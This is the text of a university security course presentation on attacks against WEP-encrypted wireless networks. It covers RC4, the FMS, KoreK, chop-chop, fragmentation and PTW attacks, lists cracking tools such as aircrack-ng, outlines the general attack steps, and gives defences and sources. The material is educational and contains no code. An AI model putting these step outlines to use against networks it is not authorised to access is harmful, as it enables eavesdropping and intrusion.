CSC-682 Advanced Computer Security Attacks on wireless networks using WEP encryption presented by : Pompi Rotaru

Wireless technology IEEE 802.11 a/b/g/n is the set of standards for W-LAN Wireless technology has been on the rise in recent years An individual can sit outside the building and connect to an unprotected wireless network Preserving privacy and integrity of wireless communications becomes an important objective of the network security team Basic service set : infrastructure mode independent (ad-hoc) mode

WEP Wired Equivalent Privacy (WEP) is most common mechanism for protection Encryption with 40-bit key (aka “64-bit encryption”) Encryption with 104-bit key (aka "128-bit encryption“) Uses as the most common encryption algorithm the RC4 algorithm.

History of WEP 1997 Release of the first final version of IEEE 802.11 2001 WEP broken by Fluhrer, Mantin, and Shamir 2004 WEP broken again by KoreK 2005 WEP broken again by KoreK again (chopchop attack) 2005 WEP broken again by Bittau, fragmentation attack 2007 WEP broken again by Pyshkin, Tews, Weinmann, with the help of Klein

RC4 algorithm description Stream cipher designed by Ron Rivest in 1987 It works as a variable key-size stream cipher with byte- oriented operations Key Scheduling Algorithm (KSA) - which turns a random key into a permutation by scrambling the bits Pseudo-Random Generator Algorithm (PRGA) – using swap operations for the previously permutation it generates pseudo- random numbers X = RC4(K)

How WEP encryption works A 3 bytes initialization vector (IV) is chosen A key stream X = RC4(K) is generated from secret key K A 32 bit long checksum called Integrity Check Value (ICV) is appended to the message to protect the integrity The resulting plain text is encrypted making an XOR operation with the generated key stream The unencrypted IV and the cipher-text are sent over the air

Types of WEP attacks Depending on key without recovering the WEP key recovering the key Depending on communication static (no communication with AP) dynamic (involves communication with AP)

General steps for attack Setup equipment (laptop, directional antenna) Find the target (airdump-ng, Kismet, NetStumbler) Capture data from air (airmon-ng, airodump-ng) Wait or make the target network busy (aireplay-ng) Start cracking from captured data (aircrack-ng)

The brute force / dictionary attack “Power” of the WEP relies in the difficulty of discovery of the secret key through a brute-force attack “Dictionary attack” uses dictionary of keys, not all possible keys Such attack requires less then a month for all keys Steps : capture 2 WEP encrypted packets try to decrypt it using the captured IV and a potential key verify decrypted ICV (the CRC) (optional) verify the key on the 2nd packet

The FMS attack 2001 - Scott Fluhrer, Itsik Mantin and Adi Shamir Static - with key recovery RC4 weaknesses : The “Invariance Weakness” - existence of large classes of weak keys The “IV Weakness” – using IV attacker can rederive the secret part by analyzing the initial word Finding the key → use key-output correlation = propagation of a weak key pattern into the outputs combined with biased distribution of bits in English text Decision tree Requires 9 millions packets (listen to traffic for 1…2 hours)

The KoreK attack Static - with key recovery 2004 – internet hacker KoreK Static - with key recovery Does not need weak IV Uses 16 additional correlations between the first 1 byte of an RC4 key, the first 2 bytes of the generated key stream, and the next keybyte Same decision-tree based approach same as FMS attack Requires 700000 packets

The KoreK chop-chop attack 2005 – same KoreK Does not recover the key, it just reveals the message Exploits an ICV vulnerability Process of truncation of packets while keeping them still valid Steps : capture one packet truncate the last byte and try to guess one “value” for plaintext correct the checksum and send packet to AP if guess is correct the AP will reply repeat until all bytes are decrypted

The Bittau attack 2005 - Andrea Bittau, Mark Handley and Joshua Lackey Fragmentation : Possible to send multiple fragments (16) using the same key stream Each packet is encrypted independently at MAC layer Steps: listen to traffic, eavesdrop one packet then recover 8 bytes of key stream prepend an IP header to the eavesdropped packet and send to AP AP will sent the clear text to a controlled internet host Fragmentation is used to break 802.11’s cryptography

The PTW attack 2007 - Andrei Pyshkin, Erik Tews & Ralf-Philipp Weinmann They found a “multibyte correlation” between the first l bytes of an RC4 key, the generated keystream, and the next i bytes of the key. Steps : captures packets and recovers their keystreams (FMS, KoreK) evaluate the multibyte correlation function (Klein) create decision tree for key and start voting (Rk[0], Rk[1], Rk[2]…) Requires 35000 …. 40000 packets Less then 60 seconds to crack a 104 bit WEP key

Protecting WEP Increase the number of bytes used for encryption (“protects” against FMS attack) Remove the weak IV - keystream re-use vulnerabilities Prevent key re-use Extensible Authentication Protocol (EAP) – change often the WEP-key (not enough against Bittau attack) Deploy Intrusion Detection Systems (IDS) to protect against injected traffic (really protects against PTW attack) Companies sell hardware using modified versions of the WEP protocol claiming to be secure

Conclusions WEP has a long history of vulnerabilities and “fixes” WEP is a good example of how attacks evolve and mature over time Attacks that a few years ago took days, now take minutes if the right tools are used 2005 WEP is officially declared deprecated by IEEE 802.11 committee 2008 WEP used by 30% of users in a US university Today – too many old networks, some using WEP WEP must be abandoned once and for all, rather than patch it yet again !!!

Bibliography http://www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf http://dl.aircrack-ng.org/breakingwepandwpa.pdf http://eprint.iacr.org/2007/120.pdf http://tapir.cs.ucl.ac.uk/bittau-wep.pdf http://www.netstumbler.org/showthread.php?t=12489 http://www.netstumbler.org/showpost.php?p=93942&postcount=35   http://www.pisa.org.hk/event/live-wifi-attack-defense/WEP_cracking_demo.pdf http://en.wikipedia.org/wiki/Fluhrer,_Mantin,_and_Shamir_attack http://www.cc.gatech.edu/~traynor/cs8803-f08/slides/lecture13-wep2.pdf http://www.rossbuffington.com/WEP_Insecurity.pdf http://www.franken.de/uploads/media/WEP-Cracking.pdf http://www.quequero.org/How_To_Attack_a_WEP/WPA_Protected_Wireless_Network_(eng) http://yawcu.sourceforge.net/documentation.pdf http://eprint.iacr.org/2007/471.pdf